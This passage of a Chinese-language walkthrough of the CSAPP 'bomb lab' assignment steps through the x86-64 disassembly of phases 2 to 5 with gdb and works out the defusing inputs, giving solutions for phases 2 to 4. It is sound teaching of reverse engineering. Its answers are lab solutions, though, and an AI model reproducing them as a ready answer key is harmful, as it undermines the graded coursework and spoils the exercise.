    21be:	4c 8d 46 08          	lea    0x8(%rsi),%r8                # 计算 %rsi+8 的地址,存入 %r8
    21c2:	48 8d 35 8d 25 00 00 	lea    0x258d(%rip),%rsi            # 计算当前指令指针 %rip+0x258d 的地址,存入 %rsi
    21c9:	b8 00 00 00 00       	mov    $0x0,%eax                    # 将 0 赋值给 %eax
    21ce:	e8 7d f1 ff ff       	call   1350 <__isoc99_sscanf@plt>   # 调用 sscanf 函数
    21d3:	48 83 c4 10          	add    $0x10,%rsp                   # 回收栈空间
    21d7:	83 f8 05             	cmp    $0x5,%eax                    # 比较 %eax 与 5,确定 sscanf 函数是否成功读入 6 个数字
    21da:	7e 05                	jle    21e1 <read_six_numbers+0x40> # 如果 %eax 小于等于 5,跳转到 21e1,也即引爆炸弹
    21dc:	48 83 c4 08          	add    $0x8,%rsp                    # 回收栈空间
    21e0:	c3                   	ret                                 # 返回
    21e1:	e8 35 ff ff ff       	call   211b <explode_bomb>          # 调用 explode_bomb 函数

回忆一下 sscanf 函数的签名:

int sscanf(const char *str, const char *format, ...);
  • str:指向要读取的字符串。
  • format:指定输入格式控制。
  • ...:可变数量的额外参数,用于存储从 str 中按照 format 指定的格式提取出的数据。

返回值:成功返回成功匹配并赋值的数据项个数。

还是谨记 x86 的函数调用约定:

  • %rdi:第一个参数
  • %rsi:第二个参数
  • %rdx:第三个参数
  • %rcx:第四个参数
  • %r8:第五个参数
  • %r9:第六个参数
  • %rax:返回值

超出六个参数的部分,会被压入栈中。压栈顺序为从右到左,注意 栈是向下增长 的,所以第七个参数(也就是第一个开始不能被寄存器传递的参数)会被压在最下方(见课本图 3.25):

process-stack

这里我们可以看到,调用 sscanf 函数的时候,我们传入了 7 个参数,其中前 6 个参数都是通过寄存器传递的,%rdi 是从 main 函数继承来的指向我们输入字符串的指针,%rsi 指向一个相对于 %rip 定位的字符串(这里你们会在第七章链接的地方学到,是一个重定向),指向一个应该是 "%d %d %d %d %d %d" 的字符串,然后 %rdx%r9 以及计算后压栈的 %rax 分别是指向我们要存储的六个数字的地址。

我们可以在 gdb 中使用 x/s $rsi 来查看 %rsi 指向的字符串,验证我们的猜想:

gdb bomb
# ...
layout asm
layout regs

# 在 call sscanf 之前设置断点
b *(phase_2+28)
c
# 继续执行一步,进入 sscanf 函数
si

# 在修改 %rsi 的语句 lea    0x258d(%rip),%rsi 之后设置断点
b *(read_six_numbers+40)
c

# 打印此时的 %rsi 指向的字符串
x/s $rsi

果不其然:

phase2-sscanf

观察读入的顺序,%rdx 的值为 %rsi,也就是我们在 phase_2 中调用 read_six_numbers 函数时传入的 %rsp,即栈指针,这里会存放第 1 个读入的数字,然后以此类推依次向上存入后续的五个数字。

现在,我们已经彻底搞清楚了 phase_2 的逻辑:它调用 read_six_numbers 读入 6 个数字,将第 1 个数字存在栈顶,然后依次向上存储其余的 5 个数字,随后开启一个循环,首先对比第一个数字是否为 1,然后对比五次下一个数字是否为前一个数字的两倍,如果不是,就爆炸。

于是我们得到 phase 2 的答案:

1 2 4 8 16 32

将其写入 psol.txt 的第二行:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
pku is better than thu

然后重新使用 gdb 运行程序,记得先在 .gdbinit 中注释掉 b phase_1 这个我们已经不需要的断点:

gdb bomb
# Breakpoint 1, 0x00005604243337bc in phase_2 ()
# 我们已经有正确答案了,直接使用 finish 或者 c 执行
c

phase2-finish

成功通过第二关!

Congratulations!

如果一切顺利的话,你甚至可以像我一样完全不借助 gdb 查看寄存器和内存的变化状况,仅仅通过阅读反汇编出来的代码就能够完成这个任务!

这种阅读能力是你必须要训练的,因为考试的时候你是没有办法使用 gdb 的,所以你必须要能够在没有调试器的情况下,通过阅读汇编代码来理解程序的运行逻辑。

Phase 3

phase 3 的反汇编代码看起来长的可怕:

000000000000182d <phase_3>:
    182d:	f3 0f 1e fa          	endbr64
    1831:	48 83 ec 28          	sub    $0x28,%rsp
    1835:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    183c:	00 00
    183e:	48 89 44 24 18       	mov    %rax,0x18(%rsp)
    1843:	31 c0                	xor    %eax,%eax
    1845:	48 8d 4c 24 0f       	lea    0xf(%rsp),%rcx
    184a:	48 8d 54 24 10       	lea    0x10(%rsp),%rdx
    184f:	4c 8d 44 24 14       	lea    0x14(%rsp),%r8
    1854:	48 8d 35 4a 29 00 00 	lea    0x294a(%rip),%rsi        # 41a5 <_IO_stdin_used+0x1a5>
    185b:	e8 f0 fa ff ff       	call   1350 <__isoc99_sscanf@plt>
    1860:	83 f8 02             	cmp    $0x2,%eax
    1863:	7e 20                	jle    1885 <phase_3+0x58>
    1865:	8b 44 24 10          	mov    0x10(%rsp),%eax
    1869:	83 f8 07             	cmp    $0x7,%eax
    186c:	0f 87 14 01 00 00    	ja     1986 <phase_3+0x159>
    1872:	89 c0                	mov    %eax,%eax
    1874:	48 8d 15 65 2b 00 00 	lea    0x2b65(%rip),%rdx        # 43e0 <_IO_stdin_used+0x3e0>
    187b:	48 63 04 82          	movslq (%rdx,%rax,4),%rax
    187f:	48 01 d0             	add    %rdx,%rax
    1882:	3e ff e0             	notrack jmp *%rax
    1885:	e8 91 08 00 00       	call   211b <explode_bomb>
    188a:	eb d9                	jmp    1865 <phase_3+0x38>
    188c:	81 7c 24 14 ce 01 00 	cmpl   $0x1ce,0x14(%rsp)
    1893:	00
    1894:	75 0a                	jne    18a0 <phase_3+0x73>
    1896:	b8 79 00 00 00       	mov    $0x79,%eax
    189b:	e9 f0 00 00 00       	jmp    1990 <phase_3+0x163>
    18a0:	e8 76 08 00 00       	call   211b <explode_bomb>
    18a5:	b8 79 00 00 00       	mov    $0x79,%eax
    18aa:	e9 e1 00 00 00       	jmp    1990 <phase_3+0x163>
    18af:	83 7c 24 14 40       	cmpl   $0x40,0x14(%rsp)
    18b4:	75 0a                	jne    18c0 <phase_3+0x93>
    18b6:	b8 61 00 00 00       	mov    $0x61,%eax
    18bb:	e9 d0 00 00 00       	jmp    1990 <phase_3+0x163>
    18c0:	e8 56 08 00 00       	call   211b <explode_bomb>
    18c5:	b8 61 00 00 00       	mov    $0x61,%eax
    18ca:	e9 c1 00 00 00       	jmp    1990 <phase_3+0x163>
    18cf:	81 7c 24 14 e5 02 00 	cmpl   $0x2e5,0x14(%rsp)
    18d6:	00
    18d7:	75 0a                	jne    18e3 <phase_3+0xb6>
    18d9:	b8 65 00 00 00       	mov    $0x65,%eax
    18de:	e9 ad 00 00 00       	jmp    1990 <phase_3+0x163>
    18e3:	e8 33 08 00 00       	call   211b <explode_bomb>
    18e8:	b8 65 00 00 00       	mov    $0x65,%eax
    18ed:	e9 9e 00 00 00       	jmp    1990 <phase_3+0x163>
    18f2:	81 7c 24 14 55 03 00 	cmpl   $0x355,0x14(%rsp)
    18f9:	00
    18fa:	75 0a                	jne    1906 <phase_3+0xd9>
    18fc:	b8 6b 00 00 00       	mov    $0x6b,%eax
    1901:	e9 8a 00 00 00       	jmp    1990 <phase_3+0x163>
    1906:	e8 10 08 00 00       	call   211b <explode_bomb>
    190b:	b8 6b 00 00 00       	mov    $0x6b,%eax
    1910:	eb 7e                	jmp    1990 <phase_3+0x163>
    1912:	81 7c 24 14 90 00 00 	cmpl   $0x90,0x14(%rsp)
    1919:	00
    191a:	75 07                	jne    1923 <phase_3+0xf6>
    191c:	b8 6e 00 00 00       	mov    $0x6e,%eax
    1921:	eb 6d                	jmp    1990 <phase_3+0x163>
    1923:	e8 f3 07 00 00       	call   211b <explode_bomb>
    1928:	b8 6e 00 00 00       	mov    $0x6e,%eax
    192d:	eb 61                	jmp    1990 <phase_3+0x163>
    192f:	81 7c 24 14 57 02 00 	cmpl   $0x257,0x14(%rsp)
    1936:	00
    1937:	75 07                	jne    1940 <phase_3+0x113>
    1939:	b8 6a 00 00 00       	mov    $0x6a,%eax
    193e:	eb 50                	jmp    1990 <phase_3+0x163>
    1940:	e8 d6 07 00 00       	call   211b <explode_bomb>
    1945:	b8 6a 00 00 00       	mov    $0x6a,%eax
    194a:	eb 44                	jmp    1990 <phase_3+0x163>
    194c:	81 7c 24 14 62 03 00 	cmpl   $0x362,0x14(%rsp)
    1953:	00
    1954:	75 07                	jne    195d <phase_3+0x130>
    1956:	b8 71 00 00 00       	mov    $0x71,%eax
    195b:	eb 33                	jmp    1990 <phase_3+0x163>
    195d:	e8 b9 07 00 00       	call   211b <explode_bomb>
    1962:	b8 71 00 00 00       	mov    $0x71,%eax
    1967:	eb 27                	jmp    1990 <phase_3+0x163>
    1969:	81 7c 24 14 e6 01 00 	cmpl   $0x1e6,0x14(%rsp)
    1970:	00
    1971:	75 07                	jne    197a <phase_3+0x14d>
    1973:	b8 78 00 00 00       	mov    $0x78,%eax
    1978:	eb 16                	jmp    1990 <phase_3+0x163>
    197a:	e8 9c 07 00 00       	call   211b <explode_bomb>
    197f:	b8 78 00 00 00       	mov    $0x78,%eax
    1984:	eb 0a                	jmp    1990 <phase_3+0x163>
    1986:	e8 90 07 00 00       	call   211b <explode_bomb>
    198b:	b8 76 00 00 00       	mov    $0x76,%eax
    1990:	38 44 24 0f          	cmp    %al,0xf(%rsp)
    1994:	75 15                	jne    19ab <phase_3+0x17e>
    1996:	48 8b 44 24 18       	mov    0x18(%rsp),%rax
    199b:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    19a2:	00 00
    19a4:	75 0c                	jne    19b2 <phase_3+0x185>
    19a6:	48 83 c4 28          	add    $0x28,%rsp
    19aa:	c3                   	ret
    19ab:	e8 6b 07 00 00       	call   211b <explode_bomb>
    19b0:	eb e4                	jmp    1996 <phase_3+0x169>
    19b2:	e8 d9 f8 ff ff       	call   1290 <__stack_chk_fail@plt>

从这个 phase 起,我将不再提供反汇编代码的逐行注释,这并不是因为我懒 ~~好吧我承认,其实有点~~,而是因为我希望你们经过前两个 phase 的详细讲解,能够学会独立地阅读反汇编代码。

看上去的确很可怕,但我们稍加阅读就可以发现,其中有很多结构十分相同的语句,稍加分析就会发现,其在最开始依旧是使用 sscanf 函数来读入了三个东西(依次设置了 %rdx%rcx%r8 指向栈针上面的特定的位置),通过如下代码可以获得 %rsi 指向的格式字符串(仍旧记得先注释掉我们已经完成的 .gdbinit 中的 b phase_2 断点):

gdb bomb
layout asm
layout regs
# 在修改 %rsi 的语句 lea    0x294a(%rip),%rsi 之后设置断点
# 也即 call sscanf 之前
b *(phase_3+46)
c
# 打印此时的 %rsi 指向的字符串
x/s $rsi

得到输出如下:

(gdb) x/s $rsi
0x558adaa221a5: "%d %c %d"

于是我们确定了,我们要输入的是一个数字、一个字符、一个数字:

  • 0x10(%rsp):为 %rdx 寄存器指向的位置,%rdx 寄存器储存第三个参数,因而是第一个存储的数字
  • 0x14(%rsp):为 %r8 寄存器指向的位置,%r8 寄存器储存第五个参数,因而是第三个存储的数字
  • 0x18(%rsp):为 %rcx 寄存器指向的位置,%rcx 寄存器储存第四个参数,因而是第二个存储的字符

继续阅读源码:

    1869:	83 f8 07             	cmp    $0x7,%eax
    186c:	0f 87 14 01 00 00    	ja     1986 <phase_3+0x159>
    1872:	89 c0                	mov    %eax,%eax
    1874:	48 8d 15 65 2b 00 00 	lea    0x2b65(%rip),%rdx        # 43e0 <_IO_stdin_used+0x3e0>
    187b:	48 63 04 82          	movslq (%rdx,%rax,4),%rax
    187f:	48 01 d0             	add    %rdx,%rax
    1882:	3e ff e0             	notrack jmp *%rax

我们发现读入后,存在一个校验,将 %rsp + 0x10 处的值(也就是我们输入的第一个数字)与 7 进行比较,如果大于 7,就会跳转到 phase_3+0x159 处,也就是爆炸。

所以第一个数字必须小于等于 7。

接着,这里又一次相对 PC 进行了一个引用,存入 %rdx,再将 %rdx + %rax * 4 处的值赋值给 %rax,接着使用一个间接跳转,跳转到 %rax 处执行。

再结合我们之前发现的代码具有很强的结构相似性,我们可以猜测,这里的代码应该是一个 switch 语句,根据我们输入的第一个数字,跳转到不同的位置执行。

接下来的事情就好办了。随便输入一个符合的字符串,然后观察一下代码会跳到哪里继续执行,然后我们就只用分析那一块的代码就可以了。

在这里,我选择的输入是:

6 a 213

注:213 是 CSAPP 的 CMU 课程号~

将之加入到 psol.txt 的第三行:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 a 213
pku is better than thu

然后重新使用 gdb 运行程序:

gdb bomb
layout asm
layout regs
# 在跳转语句 notrack jmp *%rax 之前设置断点
b *(phase_3+85)
c

phase3-switch

观察到我们跳转到了 194c 这里(以代码检索,不要以地址检索,因为地址随机化了):

    194c:	81 7c 24 14 62 03 00 	cmpl   $0x362,0x14(%rsp)
    1953:	00
    1954:	75 07                	jne    195d <phase_3+0x130>
    1956:	b8 71 00 00 00       	mov    $0x71,%eax
    195b:	eb 33                	jmp    1990 <phase_3+0x163>
    195d:	e8 b9 07 00 00       	call   211b <explode_bomb>
    1962:	b8 71 00 00 00       	mov    $0x71,%eax
    1967:	eb 27                	jmp    1990 <phase_3+0x163>

回顾一下之前准备 sscanf 的参数的时候,我们知道 0x14(%rsp) 是指向我们输入的第三个数字的,所以这里的代码是在比较我们输入的第三个数字是否为 0x362,稍加计算便知道, 0x362 是十进制的 866,所以这里的代码是在比较我们输入的第三个数字是否为 866,如果不是,就爆炸。

如果这个语句发现匹配的话,那么会继续执行 1956 处的代码,将 %eax 置为 0x71,然后跳转到 1990 处。

    1990:	38 44 24 0f          	cmp    %al,0xf(%rsp)
    1994:	75 15                	jne    19ab <phase_3+0x17e>
    1996:	48 8b 44 24 18       	mov    0x18(%rsp),%rax
    199b:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    19a2:	00 00
    19a4:	75 0c                	jne    19b2 <phase_3+0x185>
    19a6:	48 83 c4 28          	add    $0x28,%rsp
    19aa:	c3                   	ret
    19ab:	e8 6b 07 00 00       	call   211b <explode_bomb>
    19b0:	eb e4                	jmp    1996 <phase_3+0x169>
    19b2:	e8 d9 f8 ff ff       	call   1290 <__stack_chk_fail@plt>

继续阅读 1990 处的代码,我们发现,这里又是一个校验,将 0xf(%rsp) 处的值(也就是我们输入的第二个字符)与 %al(对应于 %rax 的低 8 位)进行比较,如果不相等,就爆炸。

而稍加转换,就知道 %al 的值为 0x71,也就是 q,所以这里的代码是在比较我们输入的第二个字符是否为 q

从而我们得到了 phase 3 的答案(之一):

6 q 866

将其写入 psol.txt 的第三行:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 q 866
pku is better than thu

然后重新使用 gdb 运行程序:

gdb bomb
c

phase3-finish

成功通过第三关!

Phase 4

phase 4 的代码量看起来就正常多了:

00000000000019f2 <phase_4>:
    19f2:	f3 0f 1e fa          	endbr64
    19f6:	55                   	push   %rbp
    19f7:	53                   	push   %rbx
    19f8:	48 83 ec 18          	sub    $0x18,%rsp
    19fc:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    1a03:	00 00
    1a05:	48 89 44 24 08       	mov    %rax,0x8(%rsp)
    1a0a:	31 c0                	xor    %eax,%eax
    1a0c:	48 8d 4c 24 04       	lea    0x4(%rsp),%rcx
    1a11:	48 89 e2             	mov    %rsp,%rdx
    1a14:	48 8d 35 47 2d 00 00 	lea    0x2d47(%rip),%rsi        # 4762 <array.3497+0x362>
    1a1b:	e8 30 f9 ff ff       	call   1350 <__isoc99_sscanf@plt>
    1a20:	83 f8 02             	cmp    $0x2,%eax
    1a23:	75 06                	jne    1a2b <phase_4+0x39>
    1a25:	83 3c 24 05          	cmpl   $0x5,(%rsp)
    1a29:	74 05                	je     1a30 <phase_4+0x3e>
    1a2b:	e8 eb 06 00 00       	call   211b <explode_bomb>
    1a30:	bd 00 00 00 00       	mov    $0x0,%ebp
    1a35:	bb 00 00 00 00       	mov    $0x0,%ebx
    1a3a:	39 1c 24             	cmp    %ebx,(%rsp)
    1a3d:	7e 0e                	jle    1a4d <phase_4+0x5b>
    1a3f:	89 df                	mov    %ebx,%edi
    1a41:	e8 71 ff ff ff       	call   19b7 <func4>
    1a46:	01 c5                	add    %eax,%ebp
    1a48:	83 c3 01             	add    $0x1,%ebx
    1a4b:	eb ed                	jmp    1a3a <phase_4+0x48>
    1a4d:	39 6c 24 04          	cmp    %ebp,0x4(%rsp)
    1a51:	75 17                	jne    1a6a <phase_4+0x78>
    1a53:	48 8b 44 24 08       	mov    0x8(%rsp),%rax
    1a58:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    1a5f:	00 00
    1a61:	75 0e                	jne    1a71 <phase_4+0x7f>
    1a63:	48 83 c4 18          	add    $0x18,%rsp
    1a67:	5b                   	pop    %rbx
    1a68:	5d                   	pop    %rbp
    1a69:	c3                   	ret
    1a6a:	e8 ac 06 00 00       	call   211b <explode_bomb>
    1a6f:	eb e2                	jmp    1a53 <phase_4+0x61>
    1a71:	e8 1a f8 ff ff       	call   1290 <__stack_chk_fail@plt>

依旧是老规矩,首先注释掉 .gdbinit 中的 b phase_3 断点,然后使用 gdb 运行程序

gdb bomb
layout asm
layout regs
# 在 call sscanf 这句设置断点(也即执行 call sscanf 之前)
b *(phase_4+27)
c
# 打印此时的 %rsi 指向的字符串,获得输入的格式
x/s $rsi

得到输出:

(gdb) x/s $rsi
0x562b0a53d762: "%d %d"

从而我们知道,我们需要输入两个数字。根据代码,我们知道,第一个数字会被存储在 %rsp + 0x0 处,第二个数字会被存储在 %rsp + 0x4 处。

继续阅读代码:

    1a25:	83 3c 24 05          	cmpl   $0x5,(%rsp)
    1a29:	74 05                	je     1a30 <phase_4+0x3e>
    1a2b:	e8 eb 06 00 00       	call   211b <explode_bomb>
    1a30:	bd 00 00 00 00       	mov    $0x0,%ebp
    1a35:	bb 00 00 00 00       	mov    $0x0,%ebx
    1a3a:	39 1c 24             	cmp    %ebx,(%rsp)
    1a3d:	7e 0e                	jle    1a4d <phase_4+0x5b>
    1a3f:	89 df                	mov    %ebx,%edi
    1a41:	e8 71 ff ff ff       	call   19b7 <func4>
    1a46:	01 c5                	add    %eax,%ebp
    1a48:	83 c3 01             	add    $0x1,%ebx
    1a4b:	eb ed                	jmp    1a3a <phase_4+0x48>
    1a4d:	39 6c 24 04          	cmp    %ebp,0x4(%rsp)
    1a51:	75 17                	jne    1a6a <phase_4+0x78>
    1a53:	48 8b 44 24 08       	mov    0x8(%rsp),%rax
    1a58:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    1a5f:	00 00
    1a61:	75 0e                	jne    1a71 <phase_4+0x7f>
    1a63:	48 83 c4 18          	add    $0x18,%rsp
    1a67:	5b                   	pop    %rbx
    1a68:	5d                   	pop    %rbp
    1a69:	c3                   	ret
    1a6a:	e8 ac 06 00 00       	call   211b <explode_bomb>
    1a6f:	eb e2                	jmp    1a53 <phase_4+0x61>
    1a71:	e8 1a f8 ff ff       	call   1290 <__stack_chk_fail@plt>

我们发现程序首先检验了 %rsp 处的值是否为 5,如果不是,就爆炸。

随后,通过两句 mov 指令,将 %ebp%ebx 置为 0,然后比较 %ebx(%rsp) 处的值。

如果 (%rsp) 处的值小于等于 %ebx,就跳转到 1a4d 处,这代表了这个循环的跳出。然后它会继续继续比较 %ebp0x4(%rsp) 处的值(也就是我们输入第二个参数),如果不相等,就爆炸。

如果不是的话,就将 %ebx 的值赋值给 %edi(代表第一个参数),然后调用 func4 函数,将返回值加到 %ebp 上,然后将 %ebx 加 1(从这里可以看出这个是一个循环标记),然后跳转到 1a3a 处,也就是继续比较 %ebx(%rsp) 处的值。

从而我们可以大致得到 func4 函数的逻辑:

int phase_4(int a, int b) {
    if (a != 5){
        explode_bomb();
    }
    int ebp = 0;
    for (int ebx = 0; ebx < a; ebx++) {
        ebp += func4(ebx);
    }
    if (ebp != b) {
        explode_bomb();
    }
}

那么接下来的关键,就是分析 func4 函数的逻辑,并确定对于它的返回值累积 5 次后,会得到一个什么样的值。

00000000000019b7 <func4>:
    19b7:	f3 0f 1e fa          	endbr64
    19bb:	85 ff                	test   %edi,%edi
    19bd:	7e 29                	jle    19e8 <func4+0x31>
    19bf:	55                   	push   %rbp
    19c0:	53                   	push   %rbx
    19c1:	48 83 ec 08          	sub    $0x8,%rsp
    19c5:	89 fb                	mov    %edi,%ebx
    19c7:	83 ff 01             	cmp    $0x1,%edi
    19ca:	74 22                	je     19ee <func4+0x37>
    19cc:	8d 7f ff             	lea    -0x1(%rdi),%edi
    19cf:	e8 e3 ff ff ff       	call   19b7 <func4>
    19d4:	8d 2c 00             	lea    (%rax,%rax,1),%ebp
    19d7:	8d 7b fe             	lea    -0x2(%rbx),%edi
    19da:	e8 d8 ff ff ff       	call   19b7 <func4>
    19df:	01 e8                	add    %ebp,%eax
    19e1:	48 83 c4 08          	add    $0x8,%rsp
    19e5:	5b                   	pop    %rbx
    19e6:	5d                   	pop    %rbp
    19e7:	c3                   	ret
    19e8:	b8 00 00 00 00       	mov    $0x0,%eax
    19ed:	c3                   	ret
    19ee:	89 f8                	mov    %edi,%eax
    19f0:	eb ef                	jmp    19e1 <func4+0x2a>

我们发现,这个函数首先检查了 %edi 的值是否小于等于 0,如果是的话,就返回 0。

如果不是的话,它会先保存(压栈)两个被调用者保存的寄存器 %rbp%rbx,然后将 %edi 的值赋值给 %ebx(保存初始传入的参数),接着比较 %edi 和 1 的大小,判断 %edi 是否为 1。

如果是的话,就跳转到 19ee 处,将 %edi 的值赋值给 %eax,再跳回到 19e1 处,完成对于被调用者保存的寄存器的恢复(弹栈),然后返回。

如果不是的话,就将 %edi 减 1,然后调用 func4 函数,使用返回值 %rax 计算一个 %rax + %rax ,也就是 2 * func(%edi - 1),存入 %ebp

接着,它将 %ebx 减 2,然后再次调用 func4 函数,把新的返回值 %rax 又一次加到 %ebp 上。

最后,它会弹栈,恢复 %rbx%rbp 的值,然后返回 %eax

于是我们可以得到 func4 函数的逻辑:

int func4(int a) {
    if (a <= 0) {
        return 0;
    }
    if (a == 1) {
        return a;
    }
    return 2 * func4(a - 1) + func4(a - 2);
}

从而我们得到这个函数的函数表:

| a | func4(a) | | --- | -------- | | 0 | 0 | | 1 | 1 | | 2 | 2 | | 3 | 5 | | 4 | 12 |

从而我们可以得到,这个 phase 4 中累积 5 次调用 func4 函数得到的 %ebp 的值应该为 20。

其实这里还有一个取巧的办法,就是我们完全不用分析 func4 函数的逻辑,而是直接使用 gdbcmp %ebp,0x4(%rsp) 这一句比较的时候,打印出来 %ebp 的值即可。

最终,我们可以得到 phase 4 的答案:

5 20

将其写入 psol.txt 的第四行:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 q 866
5 20
pku is better than thu

然后重新使用 gdb 运行程序:

gdb bomb
c

phase4-finish

半途已过!

Phase 5

依旧很长:

0000000000001a76 <phase_5>:
    1a76:	f3 0f 1e fa          	endbr64
    1a7a:	53                   	push   %rbx
    1a7b:	48 83 ec 10          	sub    $0x10,%rsp
    1a7f:	48 89 fb             	mov    %rdi,%rbx
    1a82:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    1a89:	00 00
    1a8b:	48 89 44 24 08       	mov    %rax,0x8(%rsp)
    1a90:	31 c0                	xor    %eax,%eax
    1a92:	e8 09 03 00 00       	call   1da0 <string_length>
    1a97:	83 f8 06             	cmp    $0x6,%eax
    1a9a:	75 28                	jne    1ac4 <phase_5+0x4e>
    1a9c:	b8 00 00 00 00       	mov    $0x0,%eax
    1aa1:	83 f8 05             	cmp    $0x5,%eax
    1aa4:	7f 25                	jg     1acb <phase_5+0x55>
    1aa6:	48 63 c8             	movslq %eax,%rcx
    1aa9:	0f b6 14 0b          	movzbl (%rbx,%rcx,1),%edx
    1aad:	83 e2 0f             	and    $0xf,%edx
    1ab0:	48 8d 35 49 29 00 00 	lea    0x2949(%rip),%rsi        # 4400 <array.3497>
    1ab7:	0f b6 14 16          	movzbl (%rsi,%rdx,1),%edx
    1abb:	88 54 0c 01          	mov    %dl,0x1(%rsp,%rcx,1)
    1abf:	83 c0 01             	add    $0x1,%eax
    1ac2:	eb dd                	jmp    1aa1 <phase_5+0x2b>
    1ac4:	e8 52 06 00 00       	call   211b <explode_bomb>
    1ac9:	eb d1                	jmp    1a9c <phase_5+0x26>
    1acb:	c6 44 24 07 00       	movb   $0x0,0x7(%rsp)
    1ad0:	48 8d 7c 24 01       	lea    0x1(%rsp),%rdi
    1ad5:	48 8d 35 d2 26 00 00 	lea    0x26d2(%rip),%rsi        # 41ae <_IO_stdin_used+0x1ae>
    1adc:	e8 d7 02 00 00       	call   1db8 <strings_not_equal>
    1ae1:	85 c0                	test   %eax,%eax
    1ae3:	75 16                	jne    1afb <phase_5+0x85>
    1ae5:	48 8b 44 24 08       	mov    0x8(%rsp),%rax
    1aea:	64 48 33 04 25 28 00 	xor    %fs:0x28,%rax
    1af1:	00 00
    1af3:	75 0d                	jne    1b02 <phase_5+0x8c>
    1af5:	48 83 c4 10          	add    $0x10,%rsp
    1af9:	5b                   	pop    %rbx
    1afa:	c3                   	ret
    1afb:	e8 1b 06 00 00       	call   211b <explode_bomb>
    1b00:	eb e3                	jmp    1ae5 <phase_5+0x6f>
    1b02:	e8 89 f7 ff ff       	call   1290 <__stack_chk_fail@plt>

老规矩,先注释掉 .gdbinit 中的 b phase_4 断点。

不同于过去的几个 phase,我们发现这里没有调用 sscanf 函数,而是直接调用了 string_length 函数,这个函数的作用是计算字符串的长度。

结合代码,我们得知需要输入的是一个长度为 6 的字符串。

那么,我们首先修改 psol.txt,随便输一个字符串试试:

Catherine Earnshaw, may you not rest as long as I am living.
1 2 4 8 16 32
6 q 866
5 20
pkuawa
pku is better than thu

注意这里是一定要多一行的,否则会识别错误。

继续来看剩下的核心代码:

    1a9c:	b8 00 00 00 00       	mov    $0x0,%eax
    1aa1:	83 f8 05             	cmp    $0x5,%eax
    1aa4:	7f 25                	jg     1acb <phase_5+0x55>
    1aa6:	48 63 c8             	movslq %eax,%rcx
    1aa9:	0f b6 14 0b          	movzbl (%rbx,%rcx,1),%edx
    1aad:	83 e2 0f             	and    $0xf,%edx
    1ab0:	48 8d 35 49 29 00 00 	lea    0x2949(%rip),%rsi        # 4400 <array.3497>
    1ab7:	0f b6 14 16          	movzbl (%rsi,%rdx,1),%edx
    1abb:	88 54 0c 01          	mov    %dl,0x1(%rsp,%rcx,1)
    1abf:	83 c0 01             	add    $0x1,%eax
    1ac2:	eb dd                	jmp    1aa1 <phase_5+0x2b>
    1ac4:	e8 52 06 00 00       	call   211b <explode_bomb>
    1ac9:	eb d1                	jmp    1a9c <phase_5+0x26>
    1acb:	c6 44 24 07 00       	movb   $0x0,0x7(%rsp)
    1ad0:	48 8d 7c 24 01       	lea    0x1(%rsp),%rdi
    1ad5:	48 8d 35 d2 26 00 00 	lea    0x26d2(%rip),%rsi        # 41ae <_IO_stdin_used+0x1ae>
    1adc:	e8 d7 02 00 00       	call   1db8 <strings_not_equal>
    1ae1:	85 c0                	test   %eax,%eax
    1ae3:	75 16                	jne    1afb <phase_5+0x85>

我们发现,这里首先将 %eax 置为 0,然后比较 %eax 和 5 的大小,如果大于 5,就跳转到 1acb 处。从而我们可以结合之前的经验,立刻推断出这里应该是一个循环,循环的次数为 6 次,而 %eax 即为循环变量。每个循环体内,%rcx 都会被首先赋值为 %eax

继续阅读,发现这里计算变址用到了 %rbx,往上找发现这个寄存器被赋值为 %rdi,而 %rdi 是我们传入的第一个参数,也就是我们输入的字符串。

这里的变址计算等价于从我们输入的字符串中取出一个字符,然后赋值给 %edx。接着,我们发现它对 %edx 进行了一个 and 0xf 的操作。

我们知道,一个字符(char)类型占有 1 个字节,也就是 8 位,而 0xf 的二进制表示为 0000 1111,也就是说,这里的操作等价于将 %edx 的值的高 4 位清零。

接着,它将 %rsi 设置为一个地址,通过反汇编给出的注释我们发现这是一个数组,因而我们使用 gdbx 命令打印出来:

gdb bomb
layout asm
layout regs
# 在 lea    0x2949(%rip),%rsi 的下一行设置断点,从而获得更新后的 %rsi
b *(phase_5+65)
c
x/s $rsi

phase5-array

我们发现这个字符数组 / 字符串的内容是:

(gdb) x/s $rsi
0x563f6ebe4400 <array.3497>:    "maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?"

而后,它又使用之前花了大力气计算来的 %rdx 的值作为下标,从 %rsi 指向的数组中取出一个字符,赋值给 %edx。再取出 %edx 的低 8 位,即 %dl,存入 %rsp + %rcx + 1 处,即从栈顶开始往上存。

使用循环重复这个过程 6 次,我们就可以在 %rsp + 1 开始的 6 个字节中存入 6 个跳来跳去获得到的字符。

1aa4 跳出循环后,我们发现它将 %rsp + 0x7 处的值置为 0,然后将 %rsp + 0x1 处的值赋值给 %rdi(第一个参数),将 %rsp + 0x26d2注意这里和之前不一样!)处的值赋值给 %rsi(第二个参数),然后调用 strings_not_equal 函数判断是否相等。

我们首先使用 gdbx 命令打印出 %rsp + 0x26d2 这里开始的 6 个字符,从而获知我们要凑的字符串是什么:

gdb bomb
layout asm
layout regs
# 在 lea    0x26d2(%rip),%rsi 的下一行设置断点,从而获得更新后的 %rsi
# 也就是 call   1db8 <strings_not_equal> 这一行,执行 strings_not_equal 之前
b *(phase_5+102)
c
x/6c $rsi

phase5-devils

(gdb) x/6c $rsi
0x55f28f7bb1ae: 100 'd' 101 'e' 118 'v' 105 'i' 108 'l' 115 's'

最终,我们发现这里需要匹配上的字符串是:devils

这个过程不可谓不离奇曲折,但是当我们知道了具体的过程之后,就可以很容易地得到答案了。

首先,我们先去维基百科找来一张 ASCII 码表

ascii

然后我们开启反向解码操作:

  1. 第一个需要的字符为 d,由于我们可以指定的 %rdx 的值的范围为 0 ~ 15(这刚好对应 "So" 前面的 "maduiersnfotvbyl" 这 16 个字符)。其中 d 位于第 3 个,也就是需要选择一个低 4 位为 0010(索引为 2)的字符,选择 b 即可。
